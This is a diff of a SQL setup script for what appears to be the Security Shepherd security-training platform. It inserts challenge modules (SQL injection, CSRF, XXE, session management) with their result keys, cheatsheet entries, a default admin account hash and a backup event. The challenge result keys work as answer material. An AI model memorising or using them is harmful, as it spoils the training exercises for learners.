+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ed732e695b85baca21d80966306a9ab5ec37477f', 'Session Management Challenge 5', 'session.management.challenge.5', 'challenge', 'Session Management', 'session.management', 'a15b8ea0b8a3374a1dedc326dfbe3dbae26', '7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1', 'open', '205', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('adc845f9624716eefabcc90d172bab4096fa2ac4', 'Failure to Restrict URL Access 3', 'failure.to.restrict.url.access.3', 'challenge', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', '8c1dbfdc7cad35a116535f76f21e448c6c7c0ebc395be2be80e5690e01adec18', 'e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4', 'open', '206', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('9294ba32bdbd680e3260a0315cd98bf6ce8b69bd', 'Session Management Challenge 6', 'session.management.challenge.6', 'challenge', 'Session Management', 'session.management', 'bb0eb566322d6b1f1dff388f5eee9929f6f1f9f5cac9eed266ef6e5053fe08e6', 'b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece', 'open', '207', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6158a695f20f9286d5f12ff3f4d42678f4a9740c', 'Security Misconfig Cookie Flag', 'security.misconfig.cookie.flag', 'challenge', 'Security Misconfigurations', 'security.misconfigurations', '92755de2ebb012e689caf8bfec629b1e237d23438427499b6bf0d7933f1b8215', 'c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4', 'open', '208', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('368491877a0318e9a774ba5d648c33cb0165ba1e', 'Session Management Challenge 7', 'session.management.challenge.7', 'challenge', 'Session Management', 'session.management', '9042eeaa8455f71deea31a5a32ae51e71477b1581c3612972902206ac51bb621', '269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80', 'open', '209', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('64070f5aec0593962a29a141110b9239d73cd7b3', 'SQL Injection 7', 'sql.injection.7', 'challenge', 'Injection', 'injection', '4637cae3d9b961fdff880d6d5ce4f69e91fe23db0aae7dcd4038e20ed8a287dc', '8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced', 'open', '210', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('145111e80400e4fd48bd3aa5aca382e9c5640793', 'Insecure Cryptographic Storage Challenge 4', 'insecure.cryptographic.storage.challenge.4', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', '50980917266ce6ec07471f49b1a046ca6a5034eb9261fb44c3ffc4b16931191c', 'b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9', 'open', '211', '115', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('7153290d128cfdef5f40742dbaeb129a36ac2340', 'Session Management Challenge 8', 'session.management.challenge.8', 'challenge', 'Session Management', 'session.management', '11d84b0ad628bb6e99e0640ff1791a29a1938609829ef5bdccee92b2bccd2bcd', '714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334', 'open', '215', '115', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5', 'CSRF 7', 'csrf.7', 'challenge', 'CSRF', 'csrf', '849e1efbb0c1e870d17d32a3e1b18a8836514619146521fbec6623fce67b73e8', '7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3', 'open', '235', '120', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key', 'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D', '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('df2ac757cc135dcb8ce5ea01f677c74f04b446d6', 'XXE Injection', 'xxe.lessons', 'lesson', 'Injection', 'injection', 'c8c232cd8e3abdfea3fcef24379415a65e00ac197af09e82602e231aa3031879', '57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a', 'closed', '55', '30', 1, 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', 'XXE Injection 1', 'xxe.injection.1', 'challenge', 'Injection', 'injection', '1016d6dce9f715e9eab4f3a884b3b316cfbba8fb4023c19f34c62bd936d5695b', 'ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e', 'closed', '60', '40', 1, 1);
COMMIT;
-- -----------------------------------------------------
-SELECT "Data for table cheatsheet"
-FROM DUAL;
+SELECT "Data for table cheatsheet" FROM DUAL;
-- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
USE `core`;
COMMIT;
COMMIT;
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('1ed105033900e462b26ca0685b00d98f59efcd93', '0dbea4cb5811fff0527184f99bd5034ca9286f11', '2012-02-10 10:11:53',
- '0dbea4cb5811fff0527184f99bd5034ca9286f11.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('286ac1acdd084193e940e6f56df5457ff05a9fe1', '453d22238401e0bf6f1ff5d45996407e98e45b07', '2012-02-10 10:11:53',
- '453d22238401e0bf6f1ff5d45996407e98e45b07.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('44a6af94f6f7a16cc92d84a936cb5c7825967b47', 'cd7f70faed73d2457219b951e714ebe5775515d8', '2012-02-10 10:11:53',
- 'cd7f70faed73d2457219b951e714ebe5775515d8.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('5487f2bf98beeb3aea66941ae8257a5e0bec38bd', '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', '2012-02-10 10:11:53',
- '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('5eccb1b8b1c033bba8ef928089808751cbe6e1f8', '94cd2de560d89ef59fc450ecc647ff4d4a55c15d', '2012-02-10 10:11:53',
- '94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('6924e936f811e174f206d5432cf7510a270a18fa', 'b70a84f159876bb9885b6e0087d22f0a52abbfcf', '2012-02-10 10:11:53',
- 'b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('7382ff2f7ee416bf0d37961ec54de32c502351de', 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', '2012-02-10 10:11:53',
- 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('776ef847e16dde4b1d65a476918d2157f62f8c91', '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', '2012-02-10 10:11:53',
- '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('82c207a4e07cbfc54faec884be6db0524e74829e', '891a0208a95f1791287be721a4b851d4c584880a', '2012-02-10 10:11:53',
- '891a0208a95f1791287be721a4b851d4c584880a.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('860e5ed692c956c2ae6c4ba20c95313d9f5b0383', 'b6432a6b5022cb044e9946315c44ab262ab59e88', '2012-02-10 10:11:53',
- 'b6432a6b5022cb044e9946315c44ab262ab59e88.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('945b7dcdef1a36ded2ab008422396f8ba51c0630', 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', '2012-02-10 10:11:53',
- 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('97f946ed0bbda4f85e472321a256eacf2293239d', '20e755179a5840be5503d42bb3711716235005ea', '2012-02-10 10:11:53',
- '20e755179a5840be5503d42bb3711716235005ea.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('af5959a242047ee87f728b87570a4e9ed9417e5e', '544aa22d3dd16a8232b093848a6523b0712b23da', '2012-02-10 10:11:53',
- '544aa22d3dd16a8232b093848a6523b0712b23da.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('b8515347017439da4216c6f8d984326eb21652d0', '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', '2012-02-10 10:11:53',
- '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('b921c6b7dc82648f0a0d07513f3eecb39b3ed064', 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', '2012-02-10 10:11:53',
- 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('ba4e0a2727561c41286aa850b89022c09e088b67', '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', '2012-02-10 10:11:53',
- '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('bb94a8412d7bb95f84c73afa420ca57fbc917912', '9533e21e285621a676bec58fc089065dec1f59f5', '2012-02-10 10:11:53',
- '9533e21e285621a676bec58fc089065dec1f59f5.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('c0b869ff8a4cd1f388e5e6bdd6525d176175c296', '408610f220b4f71f7261207a17055acbffb8a747', '2012-02-10 10:11:53',
- '408610f220b4f71f7261207a17055acbffb8a747.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('c0ed3f81fc615f28a39ed2c23555cea074e513f0', '0709410108f91314fb6f7721df9b891351eb2fcc', '2012-02-10 10:11:53',
- '0709410108f91314fb6f7721df9b891351eb2fcc.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('d0a0742494656c79767864b2898247df4f37b728', '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', '2012-02-10 10:11:53',
- '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('d51277769f9452b6508a3a22d9f52bea3b0ff84d', 'f771a10efb42a79a9dba262fd2be2e44bf40b66d', '2012-02-10 10:11:53',
- 'f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('e7e44ba680b2ab1f6958b1344c9e43931b81164a', '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', '2012-02-10 10:11:53',
- '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('f392e5a69475b14fbe5ae17639e174f379c0870e', '201ae6f8c55ba3f3b5881806387fbf34b15c30c2', '2012-02-10 10:11:53',
- '201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('6afa50948e10466e9a94c7c2b270b3f958e412c6', '82e8e9e2941a06852b90c97087309b067aeb2c4c', '2012-02-10 10:11:53',
- '82e8e9e2941a06852b90c97087309b067aeb2c4c.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('c424a4c7012ac39a4aef70f15f51ecc8fa209411', 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6', '2020-02-11 10:11:53',
- 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('e6ce51d31070bef895bf9763caeff78a0c7c2cc9', '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', '2020-10-09 10:11:53',
- '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('1ed105033900e462b26ca0685b00d98f59efcd93', '0dbea4cb5811fff0527184f99bd5034ca9286f11', '2012-02-10 10:11:53', '0dbea4cb5811fff0527184f99bd5034ca9286f11.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('286ac1acdd084193e940e6f56df5457ff05a9fe1', '453d22238401e0bf6f1ff5d45996407e98e45b07', '2012-02-10 10:11:53', '453d22238401e0bf6f1ff5d45996407e98e45b07.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('44a6af94f6f7a16cc92d84a936cb5c7825967b47', 'cd7f70faed73d2457219b951e714ebe5775515d8', '2012-02-10 10:11:53', 'cd7f70faed73d2457219b951e714ebe5775515d8.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('5487f2bf98beeb3aea66941ae8257a5e0bec38bd', '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', '2012-02-10 10:11:53', '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('5eccb1b8b1c033bba8ef928089808751cbe6e1f8', '94cd2de560d89ef59fc450ecc647ff4d4a55c15d', '2012-02-10 10:11:53', '94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('6924e936f811e174f206d5432cf7510a270a18fa', 'b70a84f159876bb9885b6e0087d22f0a52abbfcf', '2012-02-10 10:11:53', 'b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('7382ff2f7ee416bf0d37961ec54de32c502351de', 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', '2012-02-10 10:11:53', 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('776ef847e16dde4b1d65a476918d2157f62f8c91', '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', '2012-02-10 10:11:53', '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('82c207a4e07cbfc54faec884be6db0524e74829e', '891a0208a95f1791287be721a4b851d4c584880a', '2012-02-10 10:11:53', '891a0208a95f1791287be721a4b851d4c584880a.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('860e5ed692c956c2ae6c4ba20c95313d9f5b0383', 'b6432a6b5022cb044e9946315c44ab262ab59e88', '2012-02-10 10:11:53', 'b6432a6b5022cb044e9946315c44ab262ab59e88.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('945b7dcdef1a36ded2ab008422396f8ba51c0630', 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', '2012-02-10 10:11:53', 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('97f946ed0bbda4f85e472321a256eacf2293239d', '20e755179a5840be5503d42bb3711716235005ea', '2012-02-10 10:11:53', '20e755179a5840be5503d42bb3711716235005ea.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('af5959a242047ee87f728b87570a4e9ed9417e5e', '544aa22d3dd16a8232b093848a6523b0712b23da', '2012-02-10 10:11:53', '544aa22d3dd16a8232b093848a6523b0712b23da.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('b8515347017439da4216c6f8d984326eb21652d0', '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', '2012-02-10 10:11:53', '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('b921c6b7dc82648f0a0d07513f3eecb39b3ed064', 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', '2012-02-10 10:11:53', 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('ba4e0a2727561c41286aa850b89022c09e088b67', '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', '2012-02-10 10:11:53', '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('bb94a8412d7bb95f84c73afa420ca57fbc917912', '9533e21e285621a676bec58fc089065dec1f59f5', '2012-02-10 10:11:53', '9533e21e285621a676bec58fc089065dec1f59f5.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('c0b869ff8a4cd1f388e5e6bdd6525d176175c296', '408610f220b4f71f7261207a17055acbffb8a747', '2012-02-10 10:11:53', '408610f220b4f71f7261207a17055acbffb8a747.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('c0ed3f81fc615f28a39ed2c23555cea074e513f0', '0709410108f91314fb6f7721df9b891351eb2fcc', '2012-02-10 10:11:53', '0709410108f91314fb6f7721df9b891351eb2fcc.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('d0a0742494656c79767864b2898247df4f37b728', '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', '2012-02-10 10:11:53', '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('d51277769f9452b6508a3a22d9f52bea3b0ff84d', 'f771a10efb42a79a9dba262fd2be2e44bf40b66d', '2012-02-10 10:11:53', 'f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('e7e44ba680b2ab1f6958b1344c9e43931b81164a', '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', '2012-02-10 10:11:53', '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('f392e5a69475b14fbe5ae17639e174f379c0870e', '201ae6f8c55ba3f3b5881806387fbf34b15c30c2', '2012-02-10 10:11:53', '201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('6afa50948e10466e9a94c7c2b270b3f958e412c6', '82e8e9e2941a06852b90c97087309b067aeb2c4c', '2012-02-10 10:11:53', '82e8e9e2941a06852b90c97087309b067aeb2c4c.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('c424a4c7012ac39a4aef70f15f51ecc8fa209411', 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6', '2020-02-11 10:11:53', 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('e6ce51d31070bef895bf9763caeff78a0c7c2cc9', '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', '2020-10-09 10:11:53', '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution');
CALL cheatSheetCreate('a84bbf8737a9ca749d81d5226fc87e0c828138ee', 'a84bbf8737a9ca749d81d5226fc87e0c828138ee.solution');
CALL cheatSheetCreate('e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998', 'e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998.solution');
CALL cheatSheetCreate('ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe', 'ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe.solution');
@@ -2506,14 +1742,11 @@ COMMIT;
-- Default admin user
-call userCreate(null, 'admin',
- '$argon2i$v=19$m=65536,t=10,p=1$7oxgR8QkdOd4tsHFieFKrw$eOy0TCxhY1bQIAbLQcLr9Sz2+4q9DhPTz1frsytgtTk',
- 'admin', null, 'admin@securityShepherd.org', 'login', true, false);
+call userCreate(null, 'admin', '$argon2i$v=19$m=65536,t=10,p=1$7oxgR8QkdOd4tsHFieFKrw$eOy0TCxhY1bQIAbLQcLr9Sz2+4q9DhPTz1frsytgtTk', 'admin', null, 'admin@securityShepherd.org', 'login', true, false);
-- Enable backup script
-SELECT "Creating BackUp Schema"
-FROM DUAL;
+SELECT "Creating BackUp Schema" FROM DUAL;
DROP DATABASE IF EXISTS backup;
CREATE DATABASE backup;
@@ -2529,148 +1762,138 @@ USE core;
drop event IF EXISTS update_status;
create event update_status
- on schedule every 1 minute
- do
- BEGIN
-
- SET @OLD_UNIQUE_CHECKS = @@UNIQUE_CHECKS, UNIQUE_CHECKS = 0;
- SET @OLD_FOREIGN_KEY_CHECKS = @@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS = 0;
- SET @OLD_SQL_MODE = @@SQL_MODE, SQL_MODE = 'TRADITIONAL';
-
- drop table IF EXISTS `backup`.`users`;
- drop table IF EXISTS `backup`.`class`;
- drop table IF EXISTS `backup`.`modules`;
- drop table IF EXISTS `backup`.`results`;
- drop table IF EXISTS `backup`.`cheatsheet`;
- drop table IF EXISTS `backup`.`sequence`;
- -- -----------------------------------------------------
+on schedule every 1 minute
+do
+
+BEGIN
+
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+
+drop table IF EXISTS `backup`.`users`;
+drop table IF EXISTS `backup`.`class`;
+drop table IF EXISTS `backup`.`modules`;
+drop table IF EXISTS `backup`.`results`;
+drop table IF EXISTS `backup`.`cheatsheet`;
+drop table IF EXISTS `backup`.`sequence`;
+-- -----------------------------------------------------
-- Table `core`.`class`
-- -----------------------------------------------------
- CREATE TABLE IF NOT EXISTS `backup`.`class`
- (
- `classId` VARCHAR(64) NOT NULL,
- `className` VARCHAR(32) NOT NULL,
- `classYear` VARCHAR(5) NOT NULL,
- PRIMARY KEY (`classId`)
- )
- ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `backup`.`class` (
+ `classId` VARCHAR(64) NOT NULL ,
+ `className` VARCHAR(32) NOT NULL ,
+ `classYear` VARCHAR(5) NOT NULL ,
+ PRIMARY KEY (`classId`) )
+ENGINE = InnoDB;
- -- -----------------------------------------------------
+-- -----------------------------------------------------
-- Table `core`.`users`
-- -----------------------------------------------------
- CREATE TABLE IF NOT EXISTS `backup`.`users`
- (
- `userId` VARCHAR(64) NOT NULL,
- `classId` VARCHAR(64) NULL,
- `userName` VARCHAR(32) NOT NULL,
- `userPass` VARCHAR(191) NOT NULL,
- `userRole` VARCHAR(32) NOT NULL,
- `badLoginCount` INT NOT NULL DEFAULT 0,
- `suspendedUntil` DATETIME NOT NULL DEFAULT '1000-01-01 00:00:00',
- `userAddress` VARCHAR(128) NULL,
- `tempPassword` TINYINT(1) NULL DEFAULT FALSE,
- `userScore` INT NOT NULL DEFAULT 0,
- PRIMARY KEY (`userId`),
- INDEX `classId` (`classId` ASC),
- UNIQUE INDEX `userName_UNIQUE` (`userName` ASC),
- CONSTRAINT `classId`
- FOREIGN KEY (`classId`)
- REFERENCES `backup`.`class` (`classId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
- )
- ENGINE = InnoDB;
-
- -- -----------------------------------------------------
+CREATE TABLE IF NOT EXISTS `backup`.`users` (
+ `userId` VARCHAR(64) NOT NULL ,
+ `classId` VARCHAR(64) NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPass` VARCHAR(191) NOT NULL ,
+ `userRole` VARCHAR(32) NOT NULL ,
+ `badLoginCount` INT NOT NULL DEFAULT 0 ,
+ `suspendedUntil` DATETIME NOT NULL DEFAULT '1000-01-01 00:00:00' ,
+ `userAddress` VARCHAR(128) NULL ,
+ `tempPassword` TINYINT(1) NULL DEFAULT FALSE ,
+ `userScore` INT NOT NULL DEFAULT 0 ,
+ PRIMARY KEY (`userId`) ,
+ INDEX `classId` (`classId` ASC) ,
+ UNIQUE INDEX `userName_UNIQUE` (`userName` ASC) ,
+ CONSTRAINT `classId`
+ FOREIGN KEY (`classId` )
+ REFERENCES `backup`.`class` (`classId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB;
+
+-- -----------------------------------------------------
